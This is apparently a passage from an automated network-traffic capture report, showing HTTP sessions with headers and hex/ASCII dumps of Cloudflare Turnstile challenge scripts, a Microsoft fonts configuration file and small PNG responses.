                                                                          2024-10-29 15:50:51 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22
                                                                          Data Ascii: %20if%20this%20problem%20persists.","turnstile_footer_terms":"Terms","turnstile_success":"Success%21","turnstile_footer_privacy":"Privacy","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_failure":"Error","turnstile_iframe_alt":"
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 32 30 29 29 2f 37 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 37 38 34 39 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 36 30 32 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 4d 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 4d 3d 67 4c 2c 67 3d 7b 7d 2c 67 5b 67 4d 28 31 37 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 25 73 7d 2c 67 5b 67 4d 28 31 35 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67
                                                                          Data Ascii: ))/6+-parseInt(gK(1220))/7,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,778496),eM=this||self,eN=eM[gL(1602)],eO=function(f,gM,g,h,i,j,k,l,m){for(gM=gL,g={},g[gM(1727)]=function(n,s){return n%s},g[gM(1541)]=function(n,s){return n-s},g
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 5b 68 31 28 39 35 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 31 28 31 33 39 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 31 28 31 30 34 36 29 5d 3d 68 31 28 31 31 37 35 29 2c 6a 5b 68 31 28 31 38 37 32 29 5d 3d 68 31 28 31 39 30 32 29 2c 6a 5b 68 31 28 31 37 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 65 53 28 67 5b 68 31 28 35 37 38 29 5d 2c 67 5b 68 31 28 39 35 31 29 5d 29 2c 67 5b 68 31 28 35 37 38 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 68 31 28 35 37 38 29 5d 3d 4a 53 4f 4e 5b 68 31 28 31 35 38 35 29 5d 28 67 5b 68 31 28 35 37 38 29 5d
                                                                          Data Ascii: [h1(950)]=function(G,H){return G+H},j[h1(1399)]=function(G,H){return G+H},j[h1(1046)]=h1(1175),j[h1(1872)]=h1(1902),j[h1(1703)]=function(G,H){return G+H},j);try{if(l=eS(g[h1(578)],g[h1(951)]),g[h1(578)]instanceof Error?g[h1(578)]=JSON[h1(1585)](g[h1(578)]
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 32 28 31 36 33 35 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 65 5b 68 32 28 35 35 31 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 70 61 72 73 65 49 6e 74 28 6c 5b 33 5d 2c 31 30 29 29 29 3a 66 3d 4a 53 4f 4e 5b 68 32 28 31 35 38 35 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 32 28 37 32 33 29 5d 3d 66 2c 6d 5b 68 32 28 39 35 31 29 5d 3d 67 2c 6d 5b 68 32 28 34 38 39 29 5d 3d 68 2c 6d 5b 68 32 28 34 38 35 29 5d 3d 69 2c 6d 5b 68 32 28 35 37 38 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4c 28 37 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 68 34 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 68 34 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 68 34 28 31 36 38
                                                                          Data Ascii: +)/,l=j[1][h2(1635)](k),l&&(g=l[1],h=e[h2(551)](parseInt,l[2],10),i=parseInt(l[3],10))):f=JSON[h2(1585)](d);return m={},m[h2(723)]=f,m[h2(951)]=g,m[h2(489)]=h,m[h2(485)]=i,m[h2(578)]=d,m},eM[gL(731)]=function(e,f,g,h,i,h4,j,k,l,m,n,o){(h4=gL,j={},j[h4(168
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 28 31 34 34 36 29 5d 26 26 64 5b 69 32 28 31 30 37 39 29 5d 28 65 5b 69 32 28 31 37 32 30 29 5d 2c 64 5b 69 32 28 39 30 34 29 5d 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 75 29 7d 29 2c 66 77 3d 21 5b 5d 2c 21 65 58 28 67 4c 28 39 33 35 29 29 26 26 28 66 58 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 48 2c 63 2c 64 29 7b 69 48 3d 67 4c 2c 63 3d 65 4d 5b 69 48 28 37 35 37 29 5d 5b 69 48 28 36 37 31 29 5d 7c 7c 31 65 34 2c 64 3d 66 56 28 29 2c 21 65 4d 5b 69 48 28 39 34 30 29 5d 26 26 21 66 78 28 29 26 26 21 65 4d 5b 69 48 28 31 33 35 38 29 5d 5b 69 48 28 31 38 33 39 29 5d 26 26 64 2d 66 55 3e 63 3f 66 64 28 29 3a 66 65 28 29 7d 2c 31 65 33 29 29 2c 66 59 3d 7b 7d 2c 66 59 5b 67 4c 28 31 38 33 39 29 5d 3d 21 5b 5d
                                                                          Data Ascii: (1446)]&&d[i2(1079)](e[i2(1720)],d[i2(904)])&&clearInterval(fu)}),fw=![],!eX(gL(935))&&(fX(),setInterval(function(iH,c,d){iH=gL,c=eM[iH(757)][iH(671)]||1e4,d=fV(),!eM[iH(940)]&&!fx()&&!eM[iH(1358)][iH(1839)]&&d-fU>c?fd():fe()},1e3)),fY={},fY[gL(1839)]=![]
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 30 30 29 5d 26 26 67 5b 6a 68 28 39 30 37 29 5d 3f 67 5b 6a 68 28 31 38 37 33 29 5d 5b 6a 68 28 31 31 30 30 29 5d 28 6e 65 77 20 67 5b 28 6a 68 28 39 30 37 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 6a 69 2c 48 29 7b 66 6f 72 28 6a 69 3d 6a 68 2c 47 5b 6a 69 28 35 32 36 29 5d 28 29 2c 48 3d 30 3b 6f 5b 6a 69 28 31 35 31 34 29 5d 28 48 2c 47 5b 6a 69 28 31 31 34 32 29 5d 29 3b 47 5b 48 2b 31 5d 3d 3d 3d 47 5b 48 5d 3f 47 5b 6a 69 28 35 36 38 29 5d 28 6f 5b 6a 69 28 31 38 36 34 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 6a 68 28 37 31 34 29 5d 5b 6a 68 28 31 35 32 37 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 6a 68 28
                                                                          Data Ascii: 00)]&&g[jh(907)]?g[jh(1873)][jh(1100)](new g[(jh(907))](x)):function(G,ji,H){for(ji=jh,G[ji(526)](),H=0;o[ji(1514)](H,G[ji(1142)]);G[H+1]===G[H]?G[ji(568)](o[ji(1864)](H,1),1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[jh(714)][jh(1527)](B),C=0;C<x[jh(
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 2c 64 3d 7b 27 73 70 58 79 76 27 3a 6a 54 28 35 30 32 29 2c 27 5a 66 7a 51 67 27 3a 6a 54 28 31 30 38 36 29 2c 27 44 6a 44 6b 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 50 4e 78 77 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6e 57 68 53 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 70 73 73 78 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 6f 62 73 65 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 58 79 79 4b 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 4a 45 64 75 4c 27 3a 66 75 6e 63
                                                                          Data Ascii: ,d={'spXyv':jT(502),'ZfzQg':jT(1086),'DjDkl':function(h,i){return h<i},'PNxwJ':function(h,i){return i==h},'nWhSq':function(h,i){return h-i},'pssxa':function(h,i){return h&i},'obsew':function(h,i){return h(i)},'XyyKp':function(h,i){return h>i},'JEduL':func
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 6f 6e 28 69 2c 6a 55 29 7b 72 65 74 75 72 6e 20 6a 55 3d 62 2c 64 5b 6a 55 28 31 34 33 30 29 5d 5b 6a 55 28 31 39 37 36 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 6a 56 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 29 7b 69 66 28 6a 56 3d 6a 54 2c 78 3d 7b 7d 2c 78 5b 6a 56 28 39 37 34 29 5d 3d 6a 56 28 38 38 35 29 2c 42 3d 78 2c 6e 75 6c 6c 3d 3d 6a 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 4d 3c 6a 5b 6a 56 28 31 31 34 32 29 5d 3b 4d 2b 3d 31 29 69 66 28 4e 3d 6a 5b 6a 56 28 31 39 37 36 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 6a 56 28
                                                                          Data Ascii: on(i,jU){return jU=b,d[jU(1430)][jU(1976)](i)})},'g':function(j,o,s,jV,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P){if(jV=jT,x={},x[jV(974)]=jV(885),B=x,null==j)return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;M<j[jV(1142)];M+=1)if(N=j[jV(1976)](M),Object[jV(
                                                                          2024-10-29 15:50:51 UTC1369INData Raw: 5b 6a 56 28 31 39 32 33 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 6a 56 28 31 37 34 33 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 64 5b 6a 56 28 31 34 37 38 29 5d 28 4b 2c 31 29 7c 64 5b 6a 56 28 35 38 36 29 5d 28 50 2c 31 29 2c 4c 3d 3d 64 5b 6a 56 28 31 32 30 37 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 6a 56 28 31 36 39 38 29 5d 28 64 5b 6a 56 28 31 39 32 33 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 64 5b 6a 56 28 31 33 38 32 29 5d 28 43 2c 49 29 3b 4b 3d 4b 3c 3c 31 7c 50 2c 64 5b 6a 56 28 31 35 34 35 29 5d 28 4c 2c 64 5b 6a 56 28 31 31 30 35 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 6a 56
                                                                          Data Ascii: [jV(1923)](s,K)),K=0):L++,C++);for(P=F[jV(1743)](0),C=0;8>C;K=d[jV(1478)](K,1)|d[jV(586)](P,1),L==d[jV(1207)](o,1)?(L=0,J[jV(1698)](d[jV(1923)](s,K)),K=0):L++,P>>=1,C++);}else{for(P=1,C=0;d[jV(1382)](C,I);K=K<<1|P,d[jV(1545)](L,d[jV(1105)](o,1))?(L=0,J[jV


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.1649717184.28.90.27443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:51 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                          Range: bytes=0-2147483646
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-10-29 15:50:51 UTC514INHTTP/1.1 200 OK
                                                                          ApiVersion: Distribute 1.1
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          Content-Type: application/octet-stream
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          Server: ECAcc (lpl/EF06)
                                                                          X-CID: 11
                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                          X-Ms-Region: prod-weu-z1
                                                                          Cache-Control: public, max-age=75891
                                                                          Date: Tue, 29 Oct 2024 15:50:51 GMT
                                                                          Content-Length: 55
                                                                          Connection: close
                                                                          X-CID: 2
                                                                          2024-10-29 15:50:51 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.1649719104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:51 UTC742OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:51 UTC240INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:51 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452db8d4b4638-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.1649720104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:52 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:52 UTC240INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:52 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452e04b8c2caa-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.1649721104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:52 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da452d5f8116bbc&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:53 UTC331INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:52 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 118186
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452e52b61e956-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:53 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f
                                                                          Data Ascii: rowser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fco
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 4b 28 31 36 33 34 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 30 39 31 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 33 37 29 29 2f 38 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 32 37 29 29 2f 39 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 32 33 29 29 2f 31 30 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 35 34 37 33 35 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 35 32 35 29 5d 2c 65 4d 5b 67 4c 28 31 37 30 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 58 2c 65 2c 69 2c 6a 29 7b 65 3d 28 67 58 3d 67 4c 2c 7b 27 50 78 61 4c 43 27
                                                                          Data Ascii: K(1634))/6)+-parseInt(gK(1091))/7+parseInt(gK(1437))/8*(parseInt(gK(1127))/9)+parseInt(gK(1223))/10,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,547353),eM=this||self,eN=eM[gL(1525)],eM[gL(1702)]=function(c,gX,e,i,j){e=(gX=gL,{'PxaLC'
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 32 28 31 35 34 30 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 33 2c 48 29 7b 66 6f 72 28 68 33 3d 68 32 2c 47 5b 68 33 28 39 31 39 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 33 28 38 39 32 29 5d 28 48 2c 47 5b 68 33 28 33 34 34 29 5d 29 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 68 33 28 31 32 32 31 29 5d 28 48 2c 31 29 5d 3f 47 5b 68 33 28 39 33 33 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 32 28 36 37 34 29 5d 5b 68 32 28 35 37 32 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 32 28 33 34 34 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 32 28 36 30 37 29 5d 28 65 55 2c 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 6f 5b 68 32 28
                                                                          Data Ascii: 2(1540))](x)):function(G,h3,H){for(h3=h2,G[h3(919)](),H=0;o[h3(892)](H,G[h3(344)]);G[H]===G[o[h3(1221)](H,1)]?G[h3(933)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[h2(674)][h2(572)](B),C=0;C<x[h2(344)];D=x[C],E=o[h2(607)](eU,g,h,D),B(E)?(F=o[h2(
